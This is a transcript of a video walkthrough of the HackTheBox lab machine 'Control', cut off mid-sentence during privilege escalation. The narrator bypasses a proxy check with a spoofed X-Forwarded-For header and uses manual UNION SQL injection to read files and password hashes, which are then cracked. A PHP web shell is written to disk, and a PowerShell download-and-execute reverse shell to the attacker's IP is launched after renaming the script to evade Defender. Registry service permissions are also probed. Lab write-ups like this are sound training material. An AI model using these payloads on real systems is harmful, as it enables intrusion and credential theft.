What's going on YouTube? This is Ipsac. I'm doing Control from HackTheBox, and if you learn anything from this box of video, it definitely should be that automated tools are nice, but you shouldn't blindly trust everything they say. If you do, there's 2 points in this box which you'll have a lot of trouble with. The first one being getting a shell on the box, because SQLMap's going to tell you don't have the file privilege, and it's also going to have a little bit of trouble uploading and executing a script to get code execution. If you do it manually, it works just fine. Not exactly sure why SQLMap is failing, but we'll go into how to do it manually. The second part of the box will be doing the privesc. If you run tools like WinPEAS, Seatbelt, PowerUp, SharpUp, it's not going to tell you can modify services. But if you dig through the registry manually, you'll see you can change keys, and you can also see that you can edit the image path of a service and start some services. So we'll be doing that manually to edit a service and start it to get code execution as local system. With all that being said, this will make much more sense hopefully once we do it, so let's jump in. As always, we're going to start off with the nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it control, and then the IP address, which is 10.10.10.167. This can take a while to run, so I've already ran it. Looking at the results, we just have 3 ports open, the first one being HTTP on port 80, and its banner tells us it's IIS running version 10.0. So this is probably Windows 2016 or 2019. Oddly enough, when Microsoft updated to 2019 and or released service packs or anniversary editions, whatever they decided to call it now, they stopped incrementing this number. So we don't know exactly what OS this is. I'm going to create a note so we can check it if we ever get a shell. So going over to Cherry Tree, I'm creating a node and shell node that's Control-N and Control-Shift-N, and I'll name this tab in case of emergency, and this is just going to where I put some notes. So, is this 2016? If so, potential privesc via Juicy Potato. If you don't know what Juicy Potato is, you can always just go to ipsec.rocks and then search for it. If you just type Juicy, there's going to be quite a bit. So now that we got that, let's just move on to the next thing. We have MSRPC, the Microsoft Remote Procedural Call port on 135. Not too much we can do there. And then we got MySQL on port 3306. A little bit odd because normally when I see Windows servers, I think of Microsoft SQL Server, not MySQL. So this may be running like PHP or something. It's definitely not running ASP because if someone's using like the Microsoft stack, chances are they use all Microsoft services. So we can test out logging into MySQL, which is like MySQL-H for host, 10.10.10.167. And we don't get anything. I'm going to just wait 30 seconds and do it again because I am reverting the box right now, so maybe it's just not up yet. If I do ping, there we go. There we go. So I think the box was just coming up. We get my host is not allowed to connect to this MariaDB server. Once upon a time, MySQL forked when they got bought out by, I think, Oracle, maybe? And then when that happened, they just forked to a new name. So MariaDB is the same thing as MySQL. If we do -u for a username, we can try changing and we just can't log in. So I'm going to create note. What user does MySQL run under? So there may be a way to privesc if we can get MySQL to do some code execution. So that's why I put that there. I guess now is a good time to go check out the web page. So going over to 10.10.10.167, we get Fidelity is the title and some pages. The very first thing I do when I go to a web page is press Control-U to look at the source and see if I can identify if it's WordPress or anything. And just scrolling down, I don't really see too much, but this comment did stick out. To do, import products, link to new payment system, enable SSL. So I'm just going to copy this, and we will put this in case of emergency. And I'm going to put this under the top because this type of stuff is once we get a shell. So once we get shell, and then up here it can be other things. So just keep that there in my notes and we'll keep going on. And I should always do some type of recon in the background because you can't really make up for lost time. So I'm just going to run GoBuster, put in dir mode -u -x for extension. And we're going to test if this is PHP real quick. So we can do like /index.html. We get 404 file not found. We can try index.php and the page comes back. So we know it is a PHP server. And for the word list, user share word list, dirbuster, then directory list 23 medium.txt. And we'll do -out and call this control-root.out. And it's going on now. We got an image directory and we got an uploads directory, admin.php, a bunch of other things. But before we go look at that, let's just click around. Going to this about page, it looks like a bunch of like lorem ipsum type stuff, which is just random text. So nothing too interesting here. There was a good comment before, so I'm just pressing Control U to look at the page. We don't have any more HTML comments. This sign up now link looking at the bottom left is going to about.php, so nothing there. Oddly enough, we're logged in. This log out button is there. If we go to home, it says log in, and on about it says log out. If we click log out, nothing happens. So checking out the admin and we get access denied, header missing. Please ensure you go through the proxy to access this page. So don't know exactly what that is. Going back over here, we have uploads, database.php. Let's check out uploads. And one thing to point out is Windows isn't case sensitive generally. So you're going to get a lot of the same things like images and images in all caps. If this was Linux, then one would be a 404 because it's case sensitive, but Windows, it's not. So just something to keep in mind. This /uploads directory, if we go to take a look at it, we get access denied for 3 forbidden. So I'm going to start a second GoBuster. And this time we're going to do the same exact thing. And see if there's any files in here. So we'll do /uploads and X for PHP. And we'll do the same word list. Copy, paste. And this out file will be control-uploads.out. So now we're searching the uploads directory for files. We can resume this pane so we see results. And we can play with, I guess, this header, because we haven't really had anything else. So access denied, header missing. Please ensure you go through the proxy to access this page. I'm going to Google HTTP headers proxy to see exactly what headers a proxy would add. And let's see. Accept encoding. Oh man, there's a lot of headers here. Let's see. Let's change a Google query to be like proxy add headers and see if we have a list here. Forwarded custom header from Nginx reverse proxy. We can try Nginx reverse proxies to see if there's anything here. Doesn't look like it. Let's see. I'm going to cheat and do X forwarded 4 because I know that is one of the headers. Using forwarded headers from Nginx. And here are some headers that we may want to check for, like X forwarded 4, X real IP, X forwarded host. This is by far the most common one, but we'll go and check all of them. Looking at this, we do have shell.php from GoBuster, so let's just add this to the notes. There was rev.php as well, but I'm not too interested in that because normally IPs are hard-coded. So we're just adding that there, and we will create a note, or create a file called headers, and we'll name this X forwarded 4. Was it X real IP and X forwarded host maybe? Yeah. And if we wanted to find other ones, we could probably just Google each of these headers And maybe we'll come to a page that has even more of these weird headers. Let's see. I think an SMTP, like X original IP, is one. So we can try that just in case it's for this as well. So we got a few headers there. Let's use wfuzz-h for help. And let's see, where can we add header? So right here, header, use header cookie : So let's do wfuzz-u for URL, http 10.10.167/admin.php -H for header, and we'll specify fuzz : 127.0.0.1, and then -w for word list, root htb boxes control headers. And everything returns the same. We have 15 words, 89 characters. I'm going to send this to a proxy just to make sure we did this correctly. So let's see, proxy -p, so IP port type. So -p 127.0.0.1, port is 8080, and type is HTTP. So let's go over to BurpSuite, go to the proxy tab, intercept is on. So we can just send this, and bad proxy type. Maybe it's case sensitive, all caps. There we go. And let's see, X forwarded 4, 127.0.0.1. So this is looking like it is done correctly. So problem's not there. We probably have to do an IP address. And looking at this, we do have an IP here, but let's just create a Python script real quick to put everything in this like /24 network. We could do a for loop and just loop through 0 to 255 to do this, but let's complicate it a little bit and do a little bit of subnetting. So going back here, we will create the script genip.py and import the net address library, but from that specifically, we want the IP network command. So now we can just do for IP and IP network, and the IP was what, 192.168 something, 168.4.28. So we'll do 192.168.4.0/24. And then we'll just print the IP address. So we can just do print IP. Okay. Let's see if we have that module on our system. If not, we can use pip to install it. We do. And there we go. So we'll just do this to IP. Okay. So we can go back to this wfuzz thing, and instead of this 127.0.0.1, we can do fuzz2z and specify a second word list. So root htb boxes control, and this one will be IP. And I guess we can send it through the proxy again just so we can test it out. And the very first one, we have X forwarded 4, 192.168.4.0. So I'm going to Control C out of the script, drop the request, and we will take the proxy off. Because we're going to be sending a ton of requests through this, Burp may go slow if we leave it. So do this, and we probably want to hide that 89. So we'll do --H_C 89. We could have done HW to hide that. I don't know if it's capital actually. Yeah, probably just --HC. HH? Yeah, HH. I was thinking like every capital character is what you'd hide, but apparently not. So we have x forwarded 4, 192.168.4.28 returns a lot more words and characters. So let's go and add that to our header. So going here, we can go admin.php. We'll send this to BurpSuite. So if we just forward this request, we get access denied. So let's forward the request and do x forwarded 4, 192.168.4.28, I believe that was. And then send this request off. And then we can turn intercept off and we get the page. The issue is going to be if we go back, we don't have that header. So let's go to Burp on the proxy tab, go to options, and we're going to match and replace. Make sure this is on request header. And if you read this, if it's blank, it'll add a new header. So we'll just put something in replace. X forwarded 4, 192.168.4.28. And we'll put the comment here for control on HTTP to mimic proxy. Click OK. So now we will be adding this request header to all the requests. If we refresh the page, boom. You could go back to Burp, look at HTTP history. Let's see. If we go here, this is the last time we requested admin.php. You see original and auto modified request where we added it. So we got that and the header's there. And if you're kind of confused what's happening here, proxies like adding what IP address they came from. It's just something proxies do. I'm trying to think of the legitimate use case off the top of my head, but I don't really, I guess for access log. So if we go here, we have our client to proxy to internal website. So in this internal website's log, the access log is always going to have the proxy address because the proxy kind of terminates the HTTP. The client makes an HTTP request here, and then the proxy makes it to the internal website. So the client is always going to show this proxy IP. And that's not good for HTTP access log because what if something bad happened? What if you saw like an SQL injection and all you saw was the proxy? It'd be hard to translate it back to the client. So what happens is when the client makes that request, the proxy adds a header. And then the internal website, now the access log is going to show the client address of the header. So now when you look at that access log, you're like, oh, well, it came from the proxy, but the proxy's telling me this was the host. So that's kind of why you have these x forwarded 4 headers, just so the website knows the original client's IP. People have sometimes made that for like ACLs and stuff, and that's what we're abusing here. But the use case I've generally seen this for is logging issues. So hopefully that makes sense, but we'll just move on. And we have this page. So find products, create product categories, create category. So let's just go and we'll do find products P, I guess. So we'll do find products P, click search, and we get one item back. So let's go and test out SQL injection here, because that's generally the first thing we always go for. So intercept on, and we'll do, P. And then send this over to repeater, click send, and we can scroll down, we can see this, which is what the page had said. So let's add a single quote. And if we looked before, this is 2,273 bytes. With a single quote, it is 2,418 bytes. So we know the page changed. And looking through this, we can see an actual SQL error. So if we add a comment after this, we can see the error goes away because the server probably appended a Single quote, so this errors the server. Doing the comment makes what the server appends non-existent. So we can play with union injection. So before we do union, let's do order by 1, and we're just going to count the number of parameters because unions need to have the same order left and right. And I'm going to guess 1, 2, 3, 4, 5. It's going to be 5, but we have 2,273. So we're trying to see when that changes. So doing 5, we still have that. 6, still have that. 7, it changed. Now it's 286. And column not found, unknown column 7. So we know there's 7 things. So we can do union select 1. We know there's 6. 3, 4, 5, 6. And it's good. So if we put something here, if we do like please subscribe, and column number 1, it now has please subscribe in it on the page. So we overwrote that thing. If we didn't have 6 things and had a mismatch after this union, we see an error message as well. So order by is just a shorthand way of doing a bunch of unions. And sometimes union is like a dirty word. And a lot of filters will just say, hey, I don't want to accept union from clients like this and block your request. Order by is much more benign, so it has a higher chance of working. So that's why I do order by there. But with this union injection, we do have it injected there. So we can do union select, and we could do, let's try user and see if this works. Let's get rid of these double quotes. And we see we are running as manager at localhost. So we can also do queries. So the very first thing we always want to do is kind of enumerate the information schema table. So let's just go search. We can turn BurpSuite off and Google information schema, MySQL. And we got the tables. We're going to want to do, what is it? Schemata. There we go. And before we go too far into this, let's start up at SQLMap because, again, always should have some type of recon going in the background. So I'm going to copy to a file, and we're going to make this, I guess, inject.sql. Save it. V inject.sql. I'm going to remove our injection because SQLMap doesn't like you giving it a injected thing already. Save this, and we'll do SQLMap -r inject.sql --technique equals U for union. I think it's BEAUST Boolean error. I don't know what A is. Union stacked and timing. So there may be a U, but there's a bunch of techniques. If you look at the man page, you can read about them. But we'll do that, and then --batch. So that's just going to make it so it doesn't ask us anything. So going back to this, we can manually extract things out of this. So the schemata table, we want to do the schema name. So we can change this to be select schema name from information schema.schemata. And we'll probably have an error message, subquery returned more than one row. So if you want to get rid of this error, we can just do a group concat. So group underscore concat. And let's see, syntax error. Let's see, where did I error? Let's put this in quotes as well, or not quotes, but parentheses. Okay, let's see. Oh, I put the group concat in the wrong spot. So let's leave that select there. And the group concat goes in here. It goes on the field you want to select. So group concat schema name. And we have a bunch. So information schema, MySQL, and warehouse. If you don't like using commas as a separator, I think you can change that. So group concat MySQL. We can look at the function. Order by, yeah, separator. So distinct, order by. We can try this. Group concat. Separator. Let's try the semicolon first. Does this work? It does. So we could change that to be \n for new line and get it that way. So schema names are information schema, MySQL, and warehouse. So we can go to the next one, look at tables. This tab, information schema, tables. And we can do table schema, that's going to be the database, so table name. So we can do group concat, table name from information schema dot tables where was it table underscore schema? Is that right? Yeah. And that will be, I always forget how to do equals. I think it's just equals warehouse. Let's try this. There we go. Yeah, that's right. So I'm going to create a new tab. Whoops. SQL. And we'll just leave these. We'll forget the very first one, but always log good SQL commands you run, because when it comes to writing the report, you may want to include screenshots that you forgot to take. So that speeds things up. If you wanted to get the column names, we can also do that. So let's go to columns. Where is columns? Right here. And table catalog, table schema. So we want to do table schema again, and we want to get table name and column name. So we can do table name, comma, column name, and then we're going to change that separator to be colon. And I'm going to do \n here. We'll try this. Except this will be tables. Column not found, column name. Oh, we want columns. There we go. Let's see. That did not print how I thought it would. Table name, column name. I guess we can get rid of this \n. What does this look like? Product ID. Product name. Let's see. SQLMap is done, but I want to do this manually. Let's see. Product ID, product name. I'm guessing every 2 would be what we want. Let's see. Put a period there. What does this look like? Product.id, product.name. Okay. Separator, \n, colon. That's what I want. That's much more readable. So we're going to go over this command real quick. So what this did was we are selecting, I don't know why randomly that always stops, but that comes out. Oh well. Going back, we're doing a group concat, we're putting table name, and then we're putting a colon, the column name. So this is going to be one field. And every time this happens, after it, it puts a \n. So that makes it really readable. So we can go back and we have all the stuff we want. And it doesn't look too interesting. So this will be columns because I don't see like users and passwords. So if we wanted to extract data, we could do, I guess we can extract pack name. Sure. So select group concat. We can change this to pack name from information schema. This will be from warehouse dot product pack. PACK. Yep. And we don't have this where clause. Column not found. Pack name. Is it underscore? We'll do pack name comma product. I don't know why that just didn't work. Warehouse.product_pack. Maybe we're just completing the SQL query and it prints this. That's funny. ABC. So just before ABC, that. Maybe we can do tax and price. So we'll do price, tax, and instead of product packed, we will do product. There we go. So now we extracted all the tax and price. So that is how you extract data from this. If we go through SQLMap, let's see. Actually, before we do that, let's go and pull this shell.php. So if we go 10.10.10.167 uploads shell.php, it just says no. But since we're in MySQL, we should be able to get the data out of this. So we can do group concat. Is it load underscore file? And then I think the default location is inetpub www root. And then we can check uploads shell.php. We don't need the separator. We probably don't need group concat because this is going to return one thing. Let's see, did this work? We'll do 2 base 64. Okay, we will do. I didn't think we needed that. Maybe get rid of select. Oh, why do we have this from statement? Clean that up. syntax error. P union select. Okay, what do we have wrong? 1 quote, 2 quotes, 3 quotes. There we go. Parentheses, not quotes. There we go. So now we got base 64. Let's see. Another thing we could do is put concat. We don't have to do group concat because we're only dealing with one row. So we can do please subscribe, comma, and then after this, let's see, we want to do this. And support me on Patreon. Then add another parenthesis. And everything between please subscribe and support me on Patreon is going to be the base 64. But to make this a bit more readable, let's just add line breaks. So 2 \n and 2 \n. So this is base 64. We just extracted the code of this script. And if we do echo-n, paste this, base 64-d, it just says no. So looks like this is going to be a troll. We could try rev.php, and it's the same thing. If we wanted to test, we can make sure it works by grabbing admin.php. And we get a bunch of base 64. So we can grab this, go back here, let's make dir source v admin.php.b64, paste, base 64-d, admin, and we can pipe that over to admin.php and edit it, and we can see the source. So let's see. This is where they are checking if the IP is in the HTTPX forwarded for header. And you can see this tag in PHP, HTTP_origin, I think is going to, I don't exactly know. We could Google and search that, but I'll leave that to you to see exactly what this means. So just search like PHP, HTTP header, HTTP_origin, you'd find out. So go through this source to see if there's anything interesting. We got a database.php file. So let's go grab that. So database.php. Okay. Go back here. V database.php.b64. Paste. Did I have an I first? Yep. And then we can do base 64-d to the same thing. And if you're wondering how I'm typing that so fast, I'm doing Alt period, which just cycles through previous arguments you've done. So we can do v database.php, and we see a potential username and password manager with the password let me in. So we can go back to cherry tree and then do Control-Shift-N, creds, SQL, manager. Let's copy this. Paste. There we go. And that's about it for the source. If we go into home.SQLMap, we can go take a look at what this extracted. And this is actually going to lie to us. I don't know exactly why. Oh, hold on. Let's exit this. SQLMap, What? We gotta do dash dash dump dash all. And those are dump things for everything. So it's also going to try to crack things. And if we're looking at this, let's see. SQLMap is telling us manager does not have file access. And if we go look at this, I think this part is true. Let's see. If you're wondering how I know this, it's when I did the box a long time ago, and looking at my notes, I had don't trust any automated tools on this box. And then I remembered exactly what was going on. So we want to look at user privileges table. And we want to extract these fields. So real quick, we can grab this, paste it in our SQL notes. And then we'll go back to this one. So we want to do a few things. So going back to the page, grant T, we want. And then after grant T, we want table catalog. Oh man. I wonder if there's a different paste option, because I don't want to paste as like whatever special characters it's putting in. Control Shift V, plain text. Okay. We'll use that. So this one was grant T, table catalog, privilege type, and is grantable. Okay, and from information schema, user privileges. Good God. Control Z again. I think I just redo, Control Y. Privilege type. And we'll do the last one. Not sure what I just did. Sometimes you hit keys and weird things happen. And then you're just like, what did I just do? And you give up trying to figure out what you did and just redo it. And that's what happened there. So highlight this, delete that where clause, Control Shift V, user privileges. This should be fine. Copy this. Let's go to burp, paste, go, and here we go. So we got a list of all the privileges. And we only want to look at hector real quick. So file is equal to no. But the load file command worked, which is weird. Where is this? There we go. And we are running as the manager because if you remember a while back when we did user, it showed manager at localhost. And this is saying file no. If we look at MySQL, file privilege, let's see, reference manual privileges, go, file. File access on server host. So that load file thing shouldn't have worked if this is the correct one. But there's also a mysql.users. So let's do mysql.users. And let's go Google MySQL users database. Install users. Come on. Users schema. Data, grant. We'll let my just go through the output of SQLMap to get the schema we're looking for. If you wanted to, you could redo the whole process we did to extract like that tax information, do it on the users table and extract it, but thankfully, we can cheat. If we go to output, go in here, go to dump, go to MySQL, and let's look at user.csv. That is ugly. So it's looking like it uses comma as the delimiter. So I'm going to cat user.csv, pipe to sed, change comma out for tab. And that's looking better. If we do less, dash capital S to disable word wrapping, and boom, we can look at it very easily. So let's see, root manager. So we want to do manager 1, 2, 3, 4, 5, 6, 7, 8. So if we look at manager 8, so we can grep for manager, and then awk print 8, we get no. If we didn't do that grep, we could do print, we'll do, I think, 1 to 8, and localhost manager no. And that's for the file privilege. But if we go in burp and we change this, so we'll change this union select to be user. And we want to look at, is it file underscore priv? Yep. Probably a lowercase p. Let's see. Get this. We're going to leave that separator flag. Okay. From MySQL users. Hopefully I did that right. Base table mysql.users. Let's try from MySQL. Let's see, warehouse. Oh, user. MySQL.user. We have Hector as manager as yes when the SQL map told us no. So I don't know exactly what's going on there. Maybe it's taking the privilege out of the information schema and trying to apply it here. And I think the information schema, that's like is grantable. So that may say, hey, this user's allowed to do this. You're allowed to grant him the privilege. But if it's no, then you can't even grant it to him. So what I'm thinking happened is SQL map saw that information schema, assumed it was no here, and then either flush privileges hasn't been ran on the database, or Hector was, or not Hector, manager was granted privilege before that information schema change happened. I don't know exactly why SQLMap's saying no there, but we can see it's yes, and when we did the source code stealing, it also worked. So this is a long way of saying there's another thing in SQL called OUTFILE, where you can write files to disk. So saying that as yes means, oh, before we do that, let's extract the password hash. So I digress one more time. We're going to get there. It's going to be worth it, trust me. We could just grab all the hashes out of this, but I don't think people like doing it that way for some reason. So we'll do it manually. So less dash capital S. Let's see. Password. Let's see. Host, user, plugin, is role, password. So capital P. So go back here. Instead of file priv, we'll do password. And we can extract all the hashes. So we can grab this. And SQLMap does a very bad job at cracking. So let's go over to our machine called the Kraken, which is just a box at home. I just don't like doing cracking in a VM. If you're doing this, you probably should run it on your host, not within a VM, because Hashcat in a VM is no bueno. But yeah, let's just go into Hashcat. v hashes slash, we'll call this control-mysql, paste, and we'll do dot slash hashcat dash dash example hashes, search for MySQL. I'm guessing it's 300 because this 323 thing is a super short hash. This is looking better. It doesn't have that star, so we may have to delete the star out of it. Dot slash hashcat dash dash user, because we have the user colon the password hash, dash mode 300 hashes control dash MySQL and opt word list rocku.txt. We'll see if this starts. I don't think it will. I think we have to delete the stars out of it based upon what example hashes said. So token length exception. So we'll go hashes control, and we can, well, there's a duplicate. There we go. Delete the star. And is it going to go? There we go. It accepted that time. And we got another crack. Leet the XOR hector, or leet hacker hector. Leet hacker. That's what it is. So I'm just going to do dash dash show. And we can do hector and this. So going back to here, creds, SQL, hector, that. There we go. Can get out of the Kraken. And let's see if we can drop a web shell here. So let's do union select, please subscribe. And then we'll put into OUTFILE C colon, was it inet pub, www root, and we'll call this please subscribe.txt. Send this. General error is what we got, but if we send it again, file already exists. So for some reason, the SQL command error is out, but the file is there. So if you try running again, you can confirm that. Okay, we're not using BurpSuite. Paste this, and we get it. So there's another command also called dump file into, whoops. Oh my God, hitting the wrong keys. I think dump file, maybe it's just dump. But we'll do please subscribe to. And it just changes the formatting up a little bit. Whoops. So looking at the source here, we got this and a new line. This is just like that. Dump file is generally going to have less bad characters than out file. That's why I use it. And it's also, I think, not the default in a lot of tools. And not using the default things means you may bypass some type of signature for detection, which is also good. So let's change this to be PHP code. And we can do PHP system request, please subscribe. Okay. Let's see, I think that I typed it right. We'll do patreonrocks.php. So if we now go to patreonrocks.php and we put the question mark, did I do caps? I did camel case it. Please subscribe is equal to who am I? We have code execution on the box finally. So let's get out of view source so we can send it to BurpSuite. Proxy. That's not the thing. There we go. And I'm just doing it in BurpSuite because it's easier and I love changing the request method, doing post, so we don't have to worry about doing URL encoding. It's just less bad characters in a post request. So the very first thing we want to do is get a shell in the box, of course. So IEX new object net.web client download string HTTP 10.10.14.2 I believe I am, and we'll call this rev.ps1, and we need to say PowerShell, and we'll put that in quotes. So let's go clean up our things real quick. Make dir www, go in here, copy user share nashang, shells invoke, was it? Yes, invoke dash PowerShell, tcp.ps1 to shell.ps1. Edit this, and let's see, we want to take this reverse line, paste it down here, and we'll put our IP, that's 3 times 4 is 12, 3 dots, 15, 10, 10, 10, 14, 2, 4S, 9001. So how I deleted everything, I counted the number of characters and hit 15. You can see that right there. And then when I did S, that means delete and write. And yeah. But now it would not be 15 because these are only 2. So that would be 6, 8, 11. So if I did 11x, it would run delete 11 times. So that's what I was doing there. We changed it to port 9001. So NC LVNP 9001. Let's do RL wrap. That'll give us like up key, left, right, and stuff, which is very nice. Python 3-m http.server-p80. If I can type Python correctly, that would be great. We don't do -p, just 80. There we go. So now we can run this. Rev.ps1 missing. We called it shell. Let's rev.ps1. We got it, but we don't have a shell. So the very first thing I'm going to do is we can try changing the port. So rev.www, rev.ps1. Let's change this to 443. NCLVNP 443. We get it. And still don't have a shell. So at this point, I'm thinking it's the vendor. And you can run like PowerShell invoke-obfuscation against it. If you don't know what that is, you can probably search ipsec.rocks for obfuscate or Google around for it. And it'll automatically do a bunch of obfuscation to PowerShell to kind of try to bypass Defender. But we're just going to do it manually. So I'm going to delete all the comments because I'm assuming Defender has some type of bad word in the script that it's detecting. It's probably invoke-PowerShell TCP because that does not sound like a good function. But we're just going to delete the comments out of the script, see if that works, and then rename the function. Hit, no shell. So let's try change the name of this to be totally not malicious. And then here, we'll just do it again, totally not malicious. So now that's a new function name. Let's just clean that up. Send this, hit, and we get a shell. So Defender just does not like the name invoke-PowerShell TCP, whatever it is. Probably TCP reverse. So that's just AMSI, the anti-malware something, but easy to bypass because it's just looking at lines. Invoke obfuscation just renames a bunch of crap and does a bunch of things to disable that type of detection, but it's nice to see it actually working like that. So now we're on the box. We can do whoami/all, And this is going to show us all the tokens we have. And we have the SE impersonate privilege. So Juicy Potato may work. If we do system version, this should tell us if it is Windows 2016 or 2019. So running this command, it's not that. Crap, what is that command? Is it system info? Oh wow, I forgot the command name. Let's just Google Windows command show patches. Command prompt system info. What? Access denied. Ooh. So we don't have permission to actually run that. Interesting. Let's try Windows System 32, get content gc, readme.rtf, license, I think. Let's see, does this say 2019, 2016? I think my shell just, there we go. Shell did not die. Let's see. Panther? Windows get version. Let's see, is there a command? System about. Let's see. Probably have to search like Windows PowerShell. This is why I say what PowerShell version. What OS version through PowerShell via WMI. There we go. Try this. So this is going into the registry, HKey local machine, software, Windows, NT, current version, get value, release ID. This should work. 1809. Let's see. Windows release ID, 1809. 2019 0328. So I don't think Juicy Potato is going to work against this. So go back to in case of emergency. 1809. At least not without some heavy modifications. So let's go take a look at other things. Let's run WinPEAS. So let's go to a new pane, opt. Privilege escalation, awesome script suite, WinPEAS, WinPEAS exe, WinPEAS, bin, release, WinPEAS.exe, finally. And go, where is it? HTB, boxes, control, dub. Okay. And actually, before we run this command, there's one thing I want to check. So we do, who am I? We're NT authority I user. If we do net user, we do have Hector. We could do net user Hector as well and see information about him. He is a member of remote management users. And we potentially have his password. So let's try seeing if we can run a command as him. So let's do pass is equal to convert to secure string and then his password. So let's do creds copy. Okay. And then what is the next thing? It's as plain and dash force. Pass. Now that's a secure string. Cred is equal to new object, system management automation PS credential. And this is going to be hector pass. Look at cred. There we go. Next thing, we need the hostname of the computer. Fidelity. Okay. Hostname's not control. Weird. Especially when if my buffer is big enough. It's got PowerShell running as control. So it looks like this machine was renamed because here it thinks the box name is control. And here it thinks it's fidelity. So pretty unique there. Not sure exactly what that implicates or anything, but just something to keep in mind. So invoke command dash computer fidelity and then dash credential cred dash script block ix new object net.web client download string http 10.10.14.2 rev.ps1 I think we called it, or do nclvnp. Is this running as 443? It is. nclvnp 443. Run this command. We got a shell. Who am I? We are now Hector. You're not in system info? Access denied still. So what I'm going to do is copy this, because if we ever lose this shell, typing this all out is a pain. So we'll copy each command, change user, and put it here. Copy and copy. Oh god, I hate when I do Control Z and it does way more than I expected. I guess I could have done Control Y to redo, but I panicked. A lot of things got deleted and I was like, oh god, what am I going to do? And then, yeah, that's how that happened. But let's move on. So we are now Hector. So let's run the WinPEAS. So we can just do wget http 10.10.14.2 winpeas.exe -outfile winpeas.exe, and we can see we did download it. So we can just run /winpeas.exe, and this should take a minute to run, and we'll see exactly what this says. So I'm going to pause the video, let it run, and then we'll resume when it's done. WinPEAS has now finished, so let's go take a look at it. I'm just going to go to the very top. Let's do search /winpeas. There we go. And we can look through everything it says. So let's see. PowerShell logging settings. That's interesting, but nothing there. Lapse not installed, so the local administrator password is not changed frequently, and it's probably not going to be super secure and random. Lapse is like local admin policy something, I think. Essentially, it lets the local admin account of a Windows box be controlled by Active Directory, where Active Directory resets its password every X days. So it kind of prevents against pass the hash attacks because every workstation has a randomized password. Let's see, LSA protection. This will set lsas.exe to be a privileged process, which means you need a kernel driver or something to read it. Privileged processes, even if you're an administrator, you can't go and dump its memory. So that's what that is. Credential guard, I believe that's kind of like privileged process, but it's running in its own like VM outside of the OS, I think. If you go to these links, you can read more about them. Let's see, computer name, control, but where that host name returns fidelity, unique. process username. I'm seeing if this ever says like Windows version. I don't see it. Let's see, system environment variables. Nothing too interesting. HKey current users, internet security, drive information. Looks like C:users can create directories, so we could do like abuse the unquoted service path because we can create directories at the root of C. And that one is like if you do C:\program space files, Windows does recognize that, but it's going to try to go into C:\program first, and then when it can't access C:\pro, it's going to access probably program exe. You may want to do more reading up on that, but if you do C:\program files stuff, it'll probably be like software/test.exe. If this is in the binary path of a service and it's not quoted, then Windows will try to execute like program.exe first, and then it'll do some other things and then go into program file software. So because of that behavior, how it treats a space when it's not quoted, if you created that file, you could get code execution when that service starts. So that's that. Hopefully that makes sense. Let's see, UAC status, nothing interesting. Token privileges, RDP sessions, auto login credentials. Let's see, control. Nothing about processes, services. And this is going to be where, again, the theme of the box is don't trust your tools, because this is actually going to fail. So this is trying to overwrite service binaries for unquoted path and stuff, and we can't really do anything here. And then the next check is going to be registry, I believe. And this is the one where the tool is not working right. So modify service. And if you can modify any service in the registry. And it says we can't. So I'm going to copy this just for notes. Actually, is it Control-Shift print screen? Yes, it is. Because I like the coloring. So if I copy that, I wouldn't get the coloring in this. Note, paste. So we'll come back to that one. This took me a long time to find when I'm doing this box. So, auto run applications, nothing too interesting here. We probably can't write VMware tools or in System32, so that's why I'm ignoring them. Schedule tasks, let's see, network information. We never really looked at what MySQL was running under. Let's see, Windows Vault, RDP, DPAPI master keys, cred files. Let's see. Probably read this guide to see exactly what appcmd.exe is. I'm not sure off the top of my head. Current IE tab. Interesting files and registries. So right here is interesting. We have, when I tried going into Panther before, I was in System32, I think. It's not in System32, but this is where the initial user password used to be set when you install Windows through an automated tool. They've since put sensitive data deleted in this file, so you don't get the password anymore. On super old versions of Windows, you would. But we have a username Eris, and I don't think that username existed. Maybe that got renamed to Hector. So this is just going on maybe when this box was called Fidelity, the username was Eris. Cache credentials, registry keys, password files, and that's it. There's one thing I wish WinPEAS would look at, and maybe we'll create that in another video sometime down the road. But there is a it's kind of like bash history, but for PowerShell and Windows. If you go to app data, roaming, Microsoft, Windows, PowerShell, and then it's the PSReadLine directory. There's this console history host. Let's just copy and paste this. And this will be like PowerShell history. And we can see doing get child item on this. So if we run this command, actually I want to copy this, and then we can copy this next command to see exactly what they are doing. So that's getting a list of all the services on the box. And looking at this, this is going to show the permissions. This SDDL, it's a pain in the butt to read. But if you do, let's do, what is it? Let's go back to that get ACL command. So, shoot. Where is it? I guess we can just type it. So ACL is equal to get ACL. Let's do HKey local machine system current control set. And then is it services? ACL. Okay. So if we do convert from SddlString, and this is, I think, called a DACL. I forget what SDDL stands for. If we just look at this PowerShell thing in Microsoft, it'll probably tell us. Close unused tabs. One of my bad habits is I leave a lot of things open. Let's see. Security descriptor definition language. It's kind of like Windows' way of doing permissions. I think later in the video we'll go over exactly what these mean, but this is just a quick way to get it human readable. So this will be ACL dot what is it? SDDL and dash type registry rights. If you look at this type, the default is file system rights, but we're looking at the registry, so that's why I changed it to registry rights. And then for each object in, what is it? Discretionary ACL, I think. There we go. Not super easy to read in this shell, so we will copy this out. Go over here. Useful PS. So let's see. That was the command we ran. We can get rid of this. And we'll put a line break between each user. So what we're doing here is listing each user and what they're allowed to do. So we are control hector, and we have full control over the registry. We can change permission, full control right there. We can write whatever, do whatever we want to the registry. And this registry is where service configurations is. So let's go, and if we just go cd hklm, PowerShell is really cool. Oh shoot, I don't have read line wrap here, do I? Let's control C out of this real quick. L wrap, go back to our previous shell, and we will do creds, no, change user. Invoke command. Boom. So now I got my up. Oh, that was a while ago, this chisel. I forget what box we were doing there. But now I also have Control L to clear the screen. But if we go into HKey local machine, GCI, we can get like hardware, SAM, software. So we can just navigate the registry through PowerShell. It's really cool. So we want to go in system, current control set, services. Do GCI here. It's going to take a second and dump all the services. So if we go into a service, let's do WUDFRD. GCI here again. DIR. Let's go into Windows updates. GCI. we can also see things like the security. And this is where the permission is actually set. So if we do, I think get item security, this is the DACL or SDDL in binary form. It's a pain to manipulate, so we're going to ignore it for now. But just showing you how you navigate the registry in PowerShell. So let's see, what other things do we want to do? Let's get all the services that are running as system, because we can modify them. So we can probably start, stop, change the binary path, etc. So since we can modify the service in the registry, what we want to do is find a service that is running as local system that is probably not running, so we'll probably use like startup type as manual. And additionally, we want to find it that we have the permission to start and stop the service. So that's what this piece of the video is going to be about. So we'll do services is equal to get item property dash path. And we can just do star, or let's do full paths so you understand exactly what's going on, because we're in this directory. So if we just did star, it would go from that directory, but system current control set services star. Okay, so that's just this now. If we did services select, let's say like where is it? PS child name. We can get a list of all that. And if we did 